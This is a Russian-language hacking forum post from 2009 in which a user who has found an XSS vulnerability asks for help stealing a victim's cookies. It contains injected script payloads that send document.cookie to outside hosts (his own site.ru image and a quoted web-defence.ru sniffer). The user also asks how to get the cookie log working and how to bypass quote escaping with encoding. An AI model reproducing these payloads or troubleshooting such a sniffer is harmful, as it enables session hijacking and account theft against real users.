
21.11.2009, 11:32
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Есть у кого еще какие нибудь предложения по самой простой теме
Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы 
Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c "
Код:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=850'><
Пробовал без " все равно лог не пришел не какой.
Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777
Добавление:
Пробовал кодировать что бы обойти фильтр но лог так и не пришел 
Последний раз редактировалось xofffff; 21.11.2009 в 11:39..
|
|
|